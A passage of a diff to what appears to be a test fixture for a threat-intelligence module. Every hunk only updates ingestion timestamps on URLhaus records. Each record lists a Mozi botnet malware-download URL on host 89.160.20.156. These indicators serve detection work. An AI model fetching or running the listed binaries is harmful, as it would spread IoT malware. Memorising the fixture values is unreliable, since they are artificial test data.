listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13721,7 +13721,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026540500Z", + "ingested": "2021-12-14T14:56:15.726500198Z", "original": "{\"id\":\"961259\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961259/\",\"url\":\"http://89.160.20.156:51107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13770,7 +13770,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026547400Z", + "ingested": "2021-12-14T14:56:15.726500633Z", "original": "{\"id\":\"961260\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961260/\",\"url\":\"http://89.160.20.156:33790/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13819,7 +13819,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026554300Z", + "ingested": "2021-12-14T14:56:15.726500991Z", "original": "{\"id\":\"961261\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961261/\",\"url\":\"http://89.160.20.156:58919/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13868,7 +13868,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026561200Z", + "ingested": "2021-12-14T14:56:15.726501349Z", "original": "{\"id\":\"961262\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961262/\",\"url\":\"http://89.160.20.156:40395/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13917,7 +13917,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026568100Z", + "ingested": "2021-12-14T14:56:15.726501708Z", "original": "{\"id\":\"961263\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961263/\",\"url\":\"http://89.160.20.156:53510/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -13966,7 +13966,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026575Z", + "ingested": "2021-12-14T14:56:15.726502268Z", "original": "{\"id\":\"961258\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961258/\",\"url\":\"http://89.160.20.156:39115/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14015,7 +14015,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026582Z", + "ingested": "2021-12-14T14:56:15.726502624Z", "original": "{\"id\":\"961257\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961257/\",\"url\":\"http://89.160.20.156:40713/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14064,7 +14064,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026588700Z", + "ingested": "2021-12-14T14:56:15.726502988Z", "original": "{\"id\":\"961256\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961256/\",\"url\":\"http://89.160.20.156:54811/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14113,7 +14113,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026595700Z", + "ingested": "2021-12-14T14:56:15.726503354Z", "original": "{\"id\":\"961255\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961255/\",\"url\":\"http://89.160.20.156:58269/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14162,7 +14162,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026602600Z", + "ingested": "2021-12-14T14:56:15.726503709Z", "original": "{\"id\":\"961251\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961251/\",\"url\":\"http://89.160.20.156:47985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14211,7 +14211,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026609500Z", + "ingested": "2021-12-14T14:56:15.726504085Z", "original": "{\"id\":\"961252\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961252/\",\"url\":\"http://89.160.20.156:38107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14260,7 +14260,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026616400Z", + "ingested": "2021-12-14T14:56:15.726504446Z", "original": "{\"id\":\"961253\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961253/\",\"url\":\"http://89.160.20.156:50354/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14309,7 +14309,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026623400Z", + "ingested": "2021-12-14T14:56:15.726504799Z", "original": "{\"id\":\"961254\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961254/\",\"url\":\"http://89.160.20.156:44987/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14358,7 +14358,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026630200Z", + "ingested": "2021-12-14T14:56:15.726505163Z", "original": "{\"id\":\"961249\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961249/\",\"url\":\"http://89.160.20.156:44681/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14407,7 +14407,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026637200Z", + "ingested": "2021-12-14T14:56:15.726505836Z", "original": "{\"id\":\"961250\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961250/\",\"url\":\"http://89.160.20.156:58391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14456,7 +14456,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026644100Z", + "ingested": "2021-12-14T14:56:15.726506240Z", "original": "{\"id\":\"961248\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961248/\",\"url\":\"http://89.160.20.156:48540/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14505,7 +14505,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026651100Z", + "ingested": "2021-12-14T14:56:15.726506601Z", "original": "{\"id\":\"961246\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961246/\",\"url\":\"http://89.160.20.156:42755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14554,7 +14554,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026658100Z", + "ingested": "2021-12-14T14:56:15.726506972Z", "original": "{\"id\":\"961247\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961247/\",\"url\":\"http://89.160.20.156:52688/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14603,7 +14603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026665Z", + "ingested": "2021-12-14T14:56:15.726507326Z", "original": "{\"id\":\"961244\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961244/\",\"url\":\"http://89.160.20.156:33782/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14652,7 +14652,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026673900Z", + "ingested": "2021-12-14T14:56:15.726507683Z", "original": "{\"id\":\"961245\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961245/\",\"url\":\"http://89.160.20.156:50381/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14701,7 +14701,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026681Z", + "ingested": "2021-12-14T14:56:15.726508040Z", "original": "{\"id\":\"961243\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961243/\",\"url\":\"http://89.160.20.156:44219/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14751,7 +14751,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026688Z", + "ingested": "2021-12-14T14:56:15.726508402Z", "original": "{\"id\":\"961242\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961242/\",\"url\":\"http://89.160.20.156:36619/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:01:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -14800,7 +14800,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026695Z", + "ingested": "2021-12-14T14:56:15.726508753Z", "original": "{\"id\":\"961241\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961241/\",\"url\":\"http://89.160.20.156:59976/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:56:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -14849,7 +14849,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026701900Z", + "ingested": "2021-12-14T14:56:15.726509146Z", "original": "{\"id\":\"961239\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961239/\",\"url\":\"http://89.160.20.156:48688/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14898,7 +14898,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026708700Z", + "ingested": "2021-12-14T14:56:15.726509553Z", "original": "{\"id\":\"961240\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961240/\",\"url\":\"http://89.160.20.156:45682/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14947,7 +14947,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026715600Z", + "ingested": "2021-12-14T14:56:15.726509905Z", "original": "{\"id\":\"961238\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961238/\",\"url\":\"http://89.160.20.156:34922/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -14996,7 +14996,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026722600Z", + "ingested": "2021-12-14T14:56:15.726510264Z", "original": "{\"id\":\"961233\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961233/\",\"url\":\"http://89.160.20.156:37489/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15045,7 +15045,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026729600Z", + "ingested": "2021-12-14T14:56:15.726510636Z", "original": "{\"id\":\"961234\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961234/\",\"url\":\"http://89.160.20.156:51940/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15094,7 +15094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026736500Z", + "ingested": "2021-12-14T14:56:15.726511155Z", "original": "{\"id\":\"961235\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961235/\",\"url\":\"http://89.160.20.156:49599/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15143,7 +15143,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026743400Z", + "ingested": "2021-12-14T14:56:15.726511871Z", "original": "{\"id\":\"961236\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961236/\",\"url\":\"http://89.160.20.156:53436/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15192,7 +15192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026750300Z", + "ingested": "2021-12-14T14:56:15.726512317Z", "original": "{\"id\":\"961237\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961237/\",\"url\":\"http://89.160.20.156:57237/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15241,7 +15241,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026757200Z", + "ingested": "2021-12-14T14:56:15.726512680Z", "original": "{\"id\":\"961232\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961232/\",\"url\":\"http://89.160.20.156:50907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15290,7 +15290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026764300Z", + "ingested": "2021-12-14T14:56:15.726513076Z", "original": "{\"id\":\"961231\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961231/\",\"url\":\"http://89.160.20.156:41910/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15339,7 +15339,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026771300Z", + "ingested": "2021-12-14T14:56:15.726513527Z", "original": "{\"id\":\"961229\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961229/\",\"url\":\"http://89.160.20.156:57217/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15388,7 +15388,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026778200Z", + "ingested": "2021-12-14T14:56:15.726530657Z", "original": "{\"id\":\"961230\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961230/\",\"url\":\"http://89.160.20.156:47632/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15437,7 +15437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026785100Z", + "ingested": "2021-12-14T14:56:15.726531059Z", "original": "{\"id\":\"961227\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961227/\",\"url\":\"http://89.160.20.156:46654/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15486,7 +15486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026792100Z", + "ingested": "2021-12-14T14:56:15.726531429Z", "original": "{\"id\":\"961228\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961228/\",\"url\":\"http://89.160.20.156:59073/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15535,7 +15535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026798900Z", + "ingested": "2021-12-14T14:56:15.726531916Z", "original": "{\"id\":\"961221\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961221/\",\"url\":\"http://89.160.20.156:37958/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15584,7 +15584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026805800Z", + "ingested": "2021-12-14T14:56:15.726532281Z", "original": "{\"id\":\"961222\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961222/\",\"url\":\"http://89.160.20.156:53943/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15633,7 +15633,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026812700Z", + "ingested": "2021-12-14T14:56:15.726532651Z", "original": "{\"id\":\"961223\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961223/\",\"url\":\"http://89.160.20.156:40404/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15682,7 +15682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026819600Z", + "ingested": "2021-12-14T14:56:15.726533038Z", "original": "{\"id\":\"961224\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961224/\",\"url\":\"http://89.160.20.156:46738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15731,7 +15731,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026826400Z", + "ingested": "2021-12-14T14:56:15.726533408Z", "original": "{\"id\":\"961225\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961225/\",\"url\":\"http://89.160.20.156:58234/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15780,7 +15780,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026833400Z", + "ingested": "2021-12-14T14:56:15.726533962Z", "original": "{\"id\":\"961226\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961226/\",\"url\":\"http://89.160.20.156:36911/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15829,7 +15829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026840400Z", + "ingested": "2021-12-14T14:56:15.726534333Z", "original": "{\"id\":\"961220\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961220/\",\"url\":\"http://89.160.20.156:35028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 